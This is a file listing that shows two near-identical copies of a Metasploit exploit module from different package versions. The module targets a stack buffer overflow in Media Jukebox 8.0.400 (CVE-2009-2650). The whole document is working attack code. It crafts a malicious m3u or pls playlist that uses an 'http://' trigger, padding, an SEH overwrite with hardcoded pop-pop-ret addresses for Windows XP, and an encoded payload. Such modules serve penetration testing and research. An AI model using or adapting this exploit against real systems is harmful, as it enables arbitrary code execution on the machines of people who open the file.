==> metasploit-5.0.73-1-x86_64.pkg.tar.zst: opt/metasploit/modules/exploits/windows/fileformat/mediajukebox.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Media Jukebox 8.0.400 Buffer Overflow (SEH)',
      'Description' => %q{
          This module exploits a stack buffer overflow in Media Jukebox 8.0.400
        by creating a specially crafted m3u or pls file.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Ron Henry <rlh[at]ciphermonk.net>',
          'dijital1',
        ],
      'References' =>
        [
          [ 'OSVDB', '55924' ],
          [ 'CVE', '2009-2650']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => true
        },
      'Payload' =>
        {
          'Space' => 3000,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], 		# 0x02951457 pop, pop, ret dsp_mjMain.dll
          [ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], 		# 0x02291457 pop, pop, ret dsp_mjMain.dll
        ],
      'Privileged' => false,
      'DisclosureDate' => 'Jul 1 2009',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']),
      ])
  end


  def exploit
    sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger
    sploit << rand_text_alphanumeric(262)
    sploit << generate_seh_payload(target.ret)
    sploit << payload.encoded

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
  end
end

==> metasploit-6.0.37-1-x86_64.pkg.tar.zst: opt/metasploit/modules/exploits/windows/fileformat/mediajukebox.rb <==
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Media Jukebox 8.0.400 Buffer Overflow (SEH)',
      'Description' => %q{
          This module exploits a stack buffer overflow in Media Jukebox 8.0.400
        by creating a specially crafted m3u or pls file.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Ron Henry <rlh[at]ciphermonk.net>',
          'dijital1',
        ],
      'References' =>
        [
          [ 'OSVDB', '55924' ],
          [ 'CVE', '2009-2650']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => true
        },
      'Payload' =>
        {
          'Space' => 3000,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], 		# 0x02951457 pop, pop, ret dsp_mjMain.dll
          [ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], 		# 0x02291457 pop, pop, ret dsp_mjMain.dll
        ],
      'Privileged' => false,
      'DisclosureDate' => '2009-07-01',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']),
      ])
  end


  def exploit
    sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger
    sploit << rand_text_alphanumeric(262)
    sploit << generate_seh_payload(target.ret)
    sploit << payload.encoded

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
  end
end
